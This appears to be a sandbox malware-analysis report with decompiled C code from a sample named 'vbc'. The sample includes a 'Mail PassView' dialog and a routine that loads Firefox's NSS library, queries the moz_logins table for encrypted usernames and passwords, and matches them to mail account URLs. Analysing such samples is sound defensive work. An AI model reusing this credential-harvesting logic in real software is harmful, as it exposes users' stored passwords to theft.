                                                              			E0040E4A4(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
                                                              				signed int _v0;
                                                              				intOrPtr _v4;
                                                              				intOrPtr _v8;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				signed int _v28;
                                                              				intOrPtr _v44;
                                                              				struct HWND__* _v48;
                                                              				struct HWND__* _v52;
                                                              				intOrPtr _v60;
                                                              				intOrPtr _v64;
                                                              				intOrPtr _v68;
                                                              				struct HDC__* _t169;
                                                              				struct HWND__* _t171;
                                                              				intOrPtr _t223;
                                                              				void* _t224;
                                                              				intOrPtr _t235;
                                                              				struct HWND__* _t237;
                                                              				void* _t240;
                                                              				intOrPtr* _t274;
                                                              				signed int _t275;
                                                              				signed int _t276;
                                                              
                                                              				_t274 = __esi;
                                                              				_t276 = _t275 & 0xfffffff8;
                                                              				E004118A0(0x2198, __ecx);
                                                              				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
                                                              				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
                                                              				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
                                                              				_a20 = GetWindowLongA(_t237, 0xfffffff0);
                                                              				_a24 = GetWindowLongA(_a4, 0xfffffff0);
                                                              				_a96 = GetWindowLongA(_t237, 0xffffffec);
                                                              				_a36 = GetWindowLongA(_a4, 0xffffffec);
                                                              				GetWindowRect(_t237,  &_a100);
                                                              				GetWindowRect(_a4,  &_a60);
                                                              				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
                                                              				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
                                                              				_t240 = _a108 - _a100.x;
                                                              				_a4 = _a4 & 0x00000000;
                                                              				_a28 = _a68 - _a60.x;
                                                              				_a76 = _a112 - _a104;
                                                              				_a40 = _a72 - _a64;
                                                              				_t169 = GetDC( *(__esi + 4));
                                                              				_a16 = _t169;
                                                              				if(_t169 == 0) {
                                                              					L9:
                                                              					_v0 = _v0 & 0x00000000;
                                                              					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
                                                              						L12:
                                                              						_t171 = GetDlgItem( *(_t274 + 4), 1);
                                                              						_a36 = _t171;
                                                              						GetWindowRect(_t171,  &_a44);
                                                              						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
                                                              						GetClientRect( *(_t274 + 4),  &_a124);
                                                              						GetWindowRect( *(_t274 + 4),  &_a80);
                                                              						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
                                                              						GetClientRect( *(_t274 + 4),  &_a80);
                                                              						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
                                                              					}
                                                              					_a20 = _a20 | 0x10000000;
                                                              					_a24 = _a24 | 0x10000000;
                                                              					_a8 = _a12 + 0x10;
                                                              					do {
                                                              						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
                                                              						_v20 = E00401562(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
                                                              						_v44 = E00401562(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
                                                              						sprintf( &_a80, "%s:", _v52->i);
                                                              						_t276 = _t276 + 0xc;
                                                              						SetWindowTextA(_v48,  &_a80);
                                                              						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
                                                              						_v60 = _v60 + 0x14;
                                                              						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
                                                              						_v68 = _v68 + 1;
                                                              					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                              					goto L12;
                                                              				}
                                                              				_t223 = 0;
                                                              				_a32 = _a32 & 0;
                                                              				_a8 = 0;
                                                              				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
                                                              					L8:
                                                              					_t224 = _t223 - _t240;
                                                              					_a28 = _a28 - _t224;
                                                              					_a60.x = _a60.x + _t224;
                                                              					_t240 = _t240 + _t224;
                                                              					ReleaseDC( *(_t274 + 4), _a16);
                                                              					goto L9;
                                                              				}
                                                              				_v0 = _a12 + 0x10;
                                                              				do {
                                                              					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
                                                              						_t235 = _a100.x + 0xa;
                                                              						if(_t235 > _v8) {
                                                              							_v8 = _t235;
                                                              						}
                                                              					}
                                                              					_a16 =  &(_a16->i);
                                                              					_v16 = _v16 + 0x14;
                                                              				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                              				_t223 = _v8;
                                                              				goto L8;
                                                              			}

























                                                              0x0040e4a4
                                                              0x0040e4a7
                                                              0x0040e4af
                                                              0x0040e4cd
                                                              0x0040e4db
                                                              0x0040e4e8
                                                              0x0040e4f4
                                                              0x0040e4fd
                                                              0x0040e509
                                                              0x0040e515
                                                              0x0040e51f
                                                              0x0040e52a
                                                              0x0040e53e
                                                              0x0040e54c
                                                              0x0040e55d
                                                              0x0040e561
                                                              0x0040e566
                                                              0x0040e575
                                                              0x0040e581
                                                              0x0040e585
                                                              0x0040e58d
                                                              0x0040e591
                                                              0x0040e629
                                                              0x0040e62c
                                                              0x0040e638
                                                              0x0040e746
                                                              0x0040e74b
                                                              0x0040e757
                                                              0x0040e75b
                                                              0x0040e769
                                                              0x0040e780
                                                              0x0040e78a
                                                              0x0040e7d0
                                                              0x0040e7da
                                                              0x0040e819
                                                              0x0040e819
                                                              0x0040e649
                                                              0x0040e65a
                                                              0x0040e65e
                                                              0x0040e662
                                                              0x0040e66a
                                                              0x0040e69c
                                                              0x0040e6cc
                                                              0x0040e6e3
                                                              0x0040e6e8
                                                              0x0040e6f7
                                                              0x0040e715
                                                              0x0040e726
                                                              0x0040e72b
                                                              0x0040e72f
                                                              0x0040e73a
                                                              0x00000000
                                                              0x0040e662
                                                              0x0040e59a
                                                              0x0040e59c
                                                              0x0040e5a6
                                                              0x0040e5aa
                                                              0x0040e610
                                                              0x0040e614
                                                              0x0040e619
                                                              0x0040e61d
                                                              0x0040e621
                                                              0x0040e623
                                                              0x00000000
                                                              0x0040e623
                                                              0x0040e5b3
                                                              0x0040e5b7
                                                              0x0040e5de
                                                              0x0040e5e7
                                                              0x0040e5ee
                                                              0x0040e5f0
                                                              0x0040e5f0
                                                              0x0040e5ee
                                                              0x0040e5f4
                                                              0x0040e5ff
                                                              0x0040e604
                                                              0x0040e60c
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 1703216249-3046471546
                                                              • Opcode ID: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                              • Instruction ID: 2f6da9a5868e125b8128a3bf626dfa5428397bb468519cd7ccc35e9b597c58da
                                                              • Opcode Fuzzy Hash: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                              • Instruction Fuzzy Hash: C9B1DE71108341AFD710DFA8C985A6BBBE9FF88704F008A2DF699D2260D775E814CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 84%
                                                              			E004010E5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                              				struct tagPOINT _v12;
                                                              				void* __esi;
                                                              				void* _t47;
                                                              				struct HBRUSH__* _t56;
                                                              				void* _t61;
                                                              				unsigned int _t62;
                                                              				void* _t67;
                                                              				struct HWND__* _t68;
                                                              				struct HWND__* _t69;
                                                              				void* _t72;
                                                              				unsigned int _t73;
                                                              				struct HWND__* _t75;
                                                              				struct HWND__* _t76;
                                                              				struct HWND__* _t77;
                                                              				struct HWND__* _t78;
                                                              				unsigned int _t83;
                                                              				struct HWND__* _t85;
                                                              				struct HWND__* _t87;
                                                              				struct HWND__* _t88;
                                                              				struct tagPOINT _t94;
                                                              				struct tagPOINT _t96;
                                                              				void* _t102;
                                                              				void* _t113;
                                                              
                                                              				_t102 = __edx;
                                                              				_push(__ecx);
                                                              				_push(__ecx);
                                                              				_t47 = _a4 - 0x110;
                                                              				_t113 = __ecx;
                                                              				if(_t47 == 0) {
                                                              					__eflags =  *0x417348;
                                                              					if(__eflags != 0) {
                                                              						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x417348);
                                                              					} else {
                                                              						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
                                                              						ShowWindow(GetDlgItem( *(_t113 + 4), 0x3ee), 0);
                                                              					}
                                                              					SetWindowTextA( *(_t113 + 4), "Mail PassView");
                                                              					SetDlgItemTextA( *(_t113 + 4), 0x3ea, _t113 + 0xc);
                                                              					SetDlgItemTextA( *(_t113 + 4), 0x3ec, _t113 + 0x10b);
                                                              					E00401085(_t113, __eflags);
                                                              					E00406491(_t102,  *(_t113 + 4));
                                                              					goto L29;
                                                              				} else {
                                                              					_t61 = _t47 - 1;
                                                              					if(_t61 == 0) {
                                                              						_t62 = _a8;
                                                              						__eflags = _t62 - 1;
                                                              						if(_t62 != 1) {
                                                              							goto L29;
                                                              						} else {
                                                              							__eflags = _t62 >> 0x10;
                                                              							if(_t62 >> 0x10 != 0) {
                                                              								goto L29;
                                                              							} else {
                                                              								EndDialog( *(__ecx + 4), 1);
                                                              								DeleteObject( *(_t113 + 0x20c));
                                                              								goto L8;
                                                              							}
                                                              						}
                                                              					} else {
                                                              						_t67 = _t61 - 0x27;
                                                              						if(_t67 == 0) {
                                                              							_t68 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                              							__eflags = _a12 - _t68;
                                                              							if(_a12 != _t68) {
                                                              								__eflags =  *0x417388;
                                                              								if( *0x417388 == 0) {
                                                              									goto L29;
                                                              								} else {
                                                              									_t69 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                              									__eflags = _a12 - _t69;
                                                              									if(_a12 != _t69) {
                                                              										goto L29;
                                                              									} else {
                                                              										goto L18;
                                                              									}
                                                              								}
                                                              							} else {
                                                              								L18:
                                                              								SetBkMode(_a8, 1);
                                                              								SetTextColor(_a8, 0xc00000);
                                                              								_t56 = GetSysColorBrush(0xf);
                                                              							}
                                                              						} else {
                                                              							_t72 = _t67 - 0xc8;
                                                              							if(_t72 == 0) {
                                                              								_t73 = _a12;
                                                              								_t94 = _t73 & 0x0000ffff;
                                                              								_v12.x = _t94;
                                                              								_v12.y = _t73 >> 0x10;
                                                              								_t75 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                              								_push(_v12.y);
                                                              								_a8 = _t75;
                                                              								_t76 = ChildWindowFromPoint( *(_t113 + 4), _t94);
                                                              								__eflags = _t76 - _a8;
                                                              								if(_t76 != _a8) {
                                                              									__eflags =  *0x417388;
                                                              									if( *0x417388 == 0) {
                                                              										goto L29;
                                                              									} else {
                                                              										_t77 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                              										_push(_v12.y);
                                                              										_t78 = ChildWindowFromPoint( *(_t113 + 4), _v12.x);
                                                              										__eflags = _t78 - _t77;
                                                              										if(_t78 != _t77) {
                                                              											goto L29;
                                                              										} else {
                                                              											goto L13;
                                                              										}
                                                              									}
                                                              								} else {
                                                              									L13:
                                                              									SetCursor(LoadCursorA( *0x416b94, 0x67));
                                                              									goto L8;
                                                              								}
                                                              							} else {
                                                              								if(_t72 != 0) {
                                                              									L29:
                                                              									_t56 = 0;
                                                              									__eflags = 0;
                                                              								} else {
                                                              									_t83 = _a12;
                                                              									_t96 = _t83 & 0x0000ffff;
                                                              									_v12.x = _t96;
                                                              									_v12.y = _t83 >> 0x10;
                                                              									_t85 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                              									_push(_v12.y);
                                                              									_a8 = _t85;
                                                              									if(ChildWindowFromPoint( *(_t113 + 4), _t96) != _a8) {
                                                              										__eflags =  *0x417388;
                                                              										if( *0x417388 == 0) {
                                                              											goto L29;
                                                              										} else {
                                                              											_t87 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                              											_push(_v12.y);
                                                              											_t88 = ChildWindowFromPoint( *(_t113 + 4), _v12);
                                                              											__eflags = _t88 - _t87;
                                                              											if(_t88 != _t87) {
                                                              												goto L29;
                                                              											} else {
                                                              												_push(0x417388);
                                                              												goto L7;
                                                              											}
                                                              										}
                                                              									} else {
                                                              										_push(_t113 + 0x10b);
                                                              										L7:
                                                              										_push( *(_t113 + 4));
                                                              										E00406523();
                                                              										L8:
                                                              										_t56 = 1;
                                                              									}
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t56;
                                                              			}


























                                                              0x004010e5
                                                              0x004010e8
                                                              0x004010e9
                                                              0x004010ed
                                                              0x004010f5
                                                              0x004010f7
                                                              0x004012b2
                                                              0x004012b9
                                                              0x004012f4
                                                              0x004012bb
                                                              0x004012d4
                                                              0x004012e3
                                                              0x004012e3
                                                              0x00401302
                                                              0x0040131a
                                                              0x0040132b
                                                              0x0040132d
                                                              0x00401335
                                                              0x00000000
                                                              0x004010fd
                                                              0x004010fd
                                                              0x004010fe
                                                              0x0040127d
                                                              0x00401280
                                                              0x00401284
                                                              0x00000000
                                                              0x0040128a
                                                              0x0040128d
                                                              0x00401290
                                                              0x00000000
                                                              0x00401296
                                                              0x0040129b
                                                              0x004012a7
                                                              0x00000000
                                                              0x004012a7
                                                              0x00401290
                                                              0x00401104
                                                              0x00401104
                                                              0x00401107
                                                              0x0040122e
                                                              0x00401230
                                                              0x00401233
                                                              0x0040125b
                                                              0x00401262
                                                              0x00000000
                                                              0x00401268
                                                              0x00401270
                                                              0x00401272
                                                              0x00401275
                                                              0x00000000
                                                              0x0040127b
                                                              0x00000000
                                                              0x0040127b
                                                              0x00401275
                                                              0x00401235
                                                              0x00401235
                                                              0x0040123a
                                                              0x00401248
                                                              0x00401250
                                                              0x00401250
                                                              0x0040110d
                                                              0x0040110d
                                                              0x00401112
                                                              0x004011a2
                                                              0x004011ab
                                                              0x004011b9
                                                              0x004011bc
                                                              0x004011bf
                                                              0x004011c1
                                                              0x004011c4
                                                              0x004011d1
                                                              0x004011d3
                                                              0x004011d6
                                                              0x004011f2
                                                              0x004011f9
                                                              0x00000000
                                                              0x004011ff
                                                              0x00401207
                                                              0x00401209
                                                              0x00401214
                                                              0x00401216
                                                              0x00401218
                                                              0x00000000
                                                              0x0040121e
                                                              0x00000000
                                                              0x0040121e
                                                              0x00401218
                                                              0x004011d8
                                                              0x004011d8
                                                              0x004011e7
                                                              0x00000000
                                                              0x004011e7
                                                              0x00401118
                                                              0x0040111a
                                                              0x0040133b
                                                              0x0040133b
                                                              0x0040133b
                                                              0x00401120
                                                              0x00401120
                                                              0x00401129
                                                              0x00401137
                                                              0x0040113a
                                                              0x0040113d
                                                              0x0040113f
                                                              0x00401142
                                                              0x00401154
                                                              0x0040116f
                                                              0x00401176
                                                              0x00000000
                                                              0x0040117c
                                                              0x00401184
                                                              0x00401186
                                                              0x00401191
                                                              0x00401193
                                                              0x00401195
                                                              0x00000000
                                                              0x0040119b
                                                              0x0040119b
                                                              0x00000000
                                                              0x0040119b
                                                              0x00401195
                                                              0x00401156
                                                              0x0040115c
                                                              0x0040115d
                                                              0x0040115d
                                                              0x00401160
                                                              0x00401167
                                                              0x00401169
                                                              0x00401169
                                                              0x00401154
                                                              0x0040111a
                                                              0x00401112
                                                              0x00401107
                                                              0x004010fe
                                                              0x00401341

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObject
                                                              • String ID: Mail PassView
                                                              • API String ID: 3628558512-272225179
                                                              • Opcode ID: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                              • Instruction ID: a5e01e197ecdabf9e6bdb75eaf1794657044b10619e6b9182d208ef804a260cb
                                                              • Opcode Fuzzy Hash: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                              • Instruction Fuzzy Hash: 68518130044248BFEB259F60DE85EAE7BB5EB04700F10853AFA56E65F0C7759D61EB08
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 73%
                                                              			E0040CE28(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
                                                              				char* _v8;
                                                              				int _v12;
                                                              				char* _v16;
                                                              				char* _v20;
                                                              				char* _v24;
                                                              				int* _v28;
                                                              				char* _v32;
                                                              				int _v36;
                                                              				intOrPtr _v44;
                                                              				intOrPtr _v48;
                                                              				intOrPtr _v64;
                                                              				intOrPtr _v68;
                                                              				char _v72;
                                                              				char _v76;
                                                              				void _v331;
                                                              				int _v332;
                                                              				void _v587;
                                                              				int _v588;
                                                              				void _v851;
                                                              				char _v852;
                                                              				void _v1378;
                                                              				short _v1380;
                                                              				void _v1995;
                                                              				char _v1996;
                                                              				void _v2611;
                                                              				char _v2612;
                                                              				char _v3636;
                                                              				char _v4660;
                                                              				char _v5684;
                                                              				char _v6708;
                                                              				char _v7732;
                                                              				void _v8755;
                                                              				char _v8756;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t115;
                                                              				signed int _t116;
                                                              				int _t118;
                                                              				void* _t130;
                                                              				char* _t170;
                                                              				intOrPtr _t175;
                                                              				char* _t177;
                                                              				int _t196;
                                                              				intOrPtr _t226;
                                                              				void* _t229;
                                                              				int* _t232;
                                                              				char* _t235;
                                                              				void* _t237;
                                                              				void* _t238;
                                                              				void* _t239;
                                                              				void* _t240;
                                                              
                                                              				E004118A0(0x2234, __ecx);
                                                              				_t226 = _a4;
                                                              				_t232 = _t226 + 0x30;
                                                              				_v28 = _t232;
                                                              				_t115 = E0040DEEE(_t232, _t226 + 0x362);
                                                              				if(_t115 == 0) {
                                                              					L43:
                                                              					return _t115;
                                                              				}
                                                              				_t116 = _t232[1];
                                                              				_t196 = 0;
                                                              				if(_t116 == 0) {
                                                              					_t115 = _t116 | 0xffffffff;
                                                              				} else {
                                                              					_t115 =  *_t116(_t226 + 0x158);
                                                              				}
                                                              				if(_t115 != _t196) {
                                                              					L41:
                                                              					if( *_t232 == _t196) {
                                                              						goto L43;
                                                              					}
                                                              					_t118 = SetCurrentDirectoryA( &(_t232[8]));
                                                              					 *_t232 = _t196;
                                                              					return _t118;
                                                              				} else {
                                                              					_v36 = _t196;
                                                              					if(E0040F64B( &_v72, _t226 + 0x362) == 0) {
                                                              						L39:
                                                              						_t232 = _v28;
                                                              						_t115 = _t232[2];
                                                              						if(_t115 != _t196) {
                                                              							_t115 =  *_t115();
                                                              						}
                                                              						goto L41;
                                                              					} else {
                                                              						_v12 = _t196;
                                                              						_v1380 = _t196;
                                                              						memset( &_v1378, _t196, 0x208);
                                                              						_v852 = _t196;
                                                              						memset( &_v851, _t196, 0x104);
                                                              						_t239 = _t238 + 0x18;
                                                              						MultiByteToWideChar(_t196, _t196, _a8, 0xffffffff,  &_v1380, 0x104);
                                                              						WideCharToMultiByte(0xfde9, _t196,  &_v1380, 0xffffffff,  &_v852, 0x104, _t196, _t196);
                                                              						if(_v72 != _t196) {
                                                              							_v72( &_v852,  &_v12);
                                                              						}
                                                              						if(_v12 == _t196) {
                                                              							goto L39;
                                                              						}
                                                              						_a8 = _t196;
                                                              						if(_v68 != _t196) {
                                                              							_v68(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v76);
                                                              							_t239 = _t239 + 0x14;
                                                              						}
                                                              						L11:
                                                              						L11:
                                                              						if(_v64 == _t196) {
                                                              							_t130 = 0xffff;
                                                              						} else {
                                                              							_t130 = _v64(_a8);
                                                              						}
                                                              						if(_t130 != 0x64) {
                                                              							goto L34;
                                                              						}
                                                              						_v8756 = _t196;
                                                              						memset( &_v8755, _t196, 0x3ff);
                                                              						memset( &_v7732, _t196, 0x1400);
                                                              						_t240 = _t239 + 0x18;
                                                              						_t235 = E0040F7EE( &_v72, _a8, 1);
                                                              						_v20 = E0040F7EE( &_v72, _a8, 6);
                                                              						_v8 = E0040F7EE( &_v72, _a8, 7);
                                                              						_v24 = E0040F7EE( &_v72, _a8, 4);
                                                              						_v32 = E0040F7EE( &_v72, _a8, 5);
                                                              						_v16 = E0040F7EE( &_v72, _a8, 2);
                                                              						if(_t235 != _t196) {
                                                              							strcpy( &_v8756, _t235);
                                                              						}
                                                              						if(_v20 != _t196) {
                                                              							strcpy( &_v7732, _v20);
                                                              						}
                                                              						if(_v8 != _t196) {
                                                              							strcpy( &_v6708, _v8);
                                                              						}
                                                              						if(_v24 != _t196) {
                                                              							strcpy( &_v5684, _v24);
                                                              						}
                                                              						if(_v32 != _t196) {
                                                              							strcpy( &_v4660, _v32);
                                                              						}
                                                              						if(_v16 != _t196) {
                                                              							strcpy( &_v3636, _v16);
                                                              						}
                                                              						_v332 = _t196;
                                                              						memset( &_v331, _t196, 0xff);
                                                              						_v588 = _t196;
                                                              						memset( &_v587, _t196, 0xff);
                                                              						_t239 = _t240 + 0x18;
                                                              						E0040CD27(_v8, _t226,  &_v588);
                                                              						E0040CD27(_v20, _t226,  &_v332);
                                                              						_v8 = _t196;
                                                              						if( *((intOrPtr*)(_t226 + 0x474)) > _t196) {
                                                              							_v16 = _t226 + 0x468;
                                                              							do {
                                                              								_t237 = E0040D438(_v8, _v16);
                                                              								_v2612 = _t196;
                                                              								memset( &_v2611, _t196, 0x261);
                                                              								_v1996 = _t196;
                                                              								memset( &_v1995, _t196, 0x261);
                                                              								_t86 = _t237 + 0x104; // 0x104
                                                              								_t229 = _t86;
                                                              								sprintf( &_v2612, "mailbox://%s", _t229);
                                                              								sprintf( &_v1996, "imap://%s", _t229);
                                                              								_push( &_v3636);
                                                              								_t170 =  &_v2612;
                                                              								_push(_t170);
                                                              								L004115B2();
                                                              								_t239 = _t239 + 0x38;
                                                              								if(_t170 == 0) {
                                                              									L31:
                                                              									_t94 = _t237 + 0x304; // 0x304
                                                              									E004060D0(0xff, _t94,  &_v588);
                                                              									_t96 = _t237 + 0x204; // 0x204
                                                              									E004060D0(0xff, _t96,  &_v332);
                                                              									_t196 = 0;
                                                              									goto L32;
                                                              								}
                                                              								_push( &_v3636);
                                                              								_t177 =  &_v1996;
                                                              								_push(_t177);
                                                              								L004115B2();
                                                              								if(_t177 != 0) {
                                                              									goto L32;
                                                              								}
                                                              								goto L31;
                                                              								L32:
                                                              								_v8 =  &(_v8[1]);
                                                              								_t175 = _a4;
                                                              							} while (_v8 <  *((intOrPtr*)(_t175 + 0x474)));
                                                              							_t226 = _t175;
                                                              						}
                                                              						goto L11;
                                                              						L34:
                                                              						if(_a8 != _t196 && _v48 != _t196) {
                                                              							_v48(_a8);
                                                              						}
                                                              						if(_v44 != _t196) {
                                                              							_v44(_v12);
                                                              						}
                                                              						goto L39;
                                                              					}
                                                              				}
                                                              			}























































                                                              0x0040ce30
                                                              0x0040ce38
                                                              0x0040ce41
                                                              0x0040ce45
                                                              0x0040ce48
                                                              0x0040ce4f
                                                              0x0040d1e9
                                                              0x0040d1e9
                                                              0x0040d1e9
                                                              0x0040ce55
                                                              0x0040ce58
                                                              0x0040ce5c
                                                              0x0040ce6a
                                                              0x0040ce5e
                                                              0x0040ce65
                                                              0x0040ce67
                                                              0x0040ce6f
                                                              0x0040d1d5
                                                              0x0040d1d7
                                                              0x00000000
                                                              0x00000000
                                                              0x0040d1dd
                                                              0x0040d1e3
                                                              0x00000000
                                                              0x0040ce75
                                                              0x0040ce7f
                                                              0x0040ce89
                                                              0x0040d1c9
                                                              0x0040d1c9
                                                              0x0040d1cc
                                                              0x0040d1d1
                                                              0x0040d1d3
                                                              0x0040d1d3
                                                              0x00000000
                                                              0x0040ce8f
                                                              0x0040ce9c
                                                              0x0040ce9f
                                                              0x0040cea6
                                                              0x0040ceb9
                                                              0x0040cebf
                                                              0x0040cec4
                                                              0x0040ced6
                                                              0x0040cef5
                                                              0x0040cefe
                                                              0x0040cf0b
                                                              0x0040cf0f
                                                              0x0040cf13
                                                              0x00000000
                                                              0x00000000
                                                              0x0040cf1c
                                                              0x0040cf1f
                                                              0x0040cf33
                                                              0x0040cf36
                                                              0x0040cf36
                                                              0x00000000
                                                              0x0040cf39
                                                              0x0040cf3c
                                                              0x0040cf47
                                                              0x0040cf3e
                                                              0x0040cf41
                                                              0x0040cf44
                                                              0x0040cf4f
                                                              0x00000000
                                                              0x00000000
                                                              0x0040cf62
                                                              0x0040cf68
                                                              0x0040cf7a
                                                              0x0040cf7f
                                                              0x0040cf94
                                                              0x0040cfa3
                                                              0x0040cfb3
                                                              0x0040cfc3
                                                              0x0040cfd3
                                                              0x0040cfe0
                                                              0x0040cfe3
                                                              0x0040cfed
                                                              0x0040cff3
                                                              0x0040cff7
                                                              0x0040d003
                                                              0x0040d009
                                                              0x0040d00d
                                                              0x0040d019
                                                              0x0040d01f
                                                              0x0040d023
                                                              0x0040d02f
                                                              0x0040d035
                                                              0x0040d039
                                                              0x0040d045
                                                              0x0040d04b
                                                              0x0040d04f
                                                              0x0040d05b
                                                              0x0040d061
                                                              0x0040d070
                                                              0x0040d076
                                                              0x0040d084
                                                              0x0040d08a
                                                              0x0040d08f
                                                              0x0040d09e
                                                              0x0040d0af
                                                              0x0040d0ba
                                                              0x0040d0bd
                                                              0x0040d0c9
                                                              0x0040d0cc
                                                              0x0040d0dd
                                                              0x0040d0e7
                                                              0x0040d0ed
                                                              0x0040d0fb
                                                              0x0040d101
                                                              0x0040d106
                                                              0x0040d106
                                                              0x0040d119
                                                              0x0040d12b
                                                              0x0040d136
                                                              0x0040d137
                                                              0x0040d13d
                                                              0x0040d13e
                                                              0x0040d143
                                                              0x0040d148
                                                              0x0040d163
                                                              0x0040d16a
                                                              0x0040d175
                                                              0x0040d181
                                                              0x0040d187
                                                              0x0040d18e
                                                              0x00000000
                                                              0x0040d18e
                                                              0x0040d150
                                                              0x0040d151
                                                              0x0040d157
                                                              0x0040d158
                                                              0x0040d161
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040d190
                                                              0x0040d190
                                                              0x0040d193
                                                              0x0040d199
                                                              0x0040d1a5
                                                              0x0040d1a5
                                                              0x00000000
                                                              0x0040d1ac
                                                              0x0040d1af
                                                              0x0040d1b9
                                                              0x0040d1bc
                                                              0x0040d1c0
                                                              0x0040d1c5
                                                              0x0040d1c8
                                                              0x00000000
                                                              0x0040d1c0
                                                              0x0040ce89

                                                              APIs
                                                                • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF0F
                                                                • Part of subcall function 0040DEEE: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                • Part of subcall function 0040DEEE: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF62
                                                                • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF6C
                                                                • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF7A
                                                                • Part of subcall function 0040DEEE: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
